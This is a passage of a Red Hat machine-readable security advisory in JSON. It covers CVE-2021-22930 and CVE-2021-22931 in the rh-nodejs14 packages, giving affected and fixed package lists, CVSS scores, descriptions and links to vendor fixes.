"7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "c-ares: Missing input validation of host names may lead to domain hijacking" }, { "cve": "CVE-2021-22930", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-07-30T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1988394" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js, where it is vulnerable to a use-after-free attack. This flaw allows an attacker to exploit the memory corruption, which causes a change in the process behavior. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Use-after-free on close http2 on stream canceling", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22930" }, { "category": "external", "summary": "RHBZ#1988394", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1988394" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22930", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22930" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22930", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22930" } ], "release_date": "2021-07-29T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "nodejs: Use-after-free on close http2 on stream canceling" }, { "cve": "CVE-2021-22931", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-08-12T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993019" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js. These vulnerabilities include remote code execution, Cross-site scripting (XSS), application crashes due to missing input validation of hostnames returned by Domain Name Servers in the Node.js DNS library, which can lead to the output of wrong hostnames (leading to Domain hijacking) and injection vulnerabilities in applications using the library.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Improper handling of untypical characters in domain names", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22931" }, { "category": "external", "summary": "RHBZ#1993019", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993019" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22931", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22931" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22931", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22931" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", 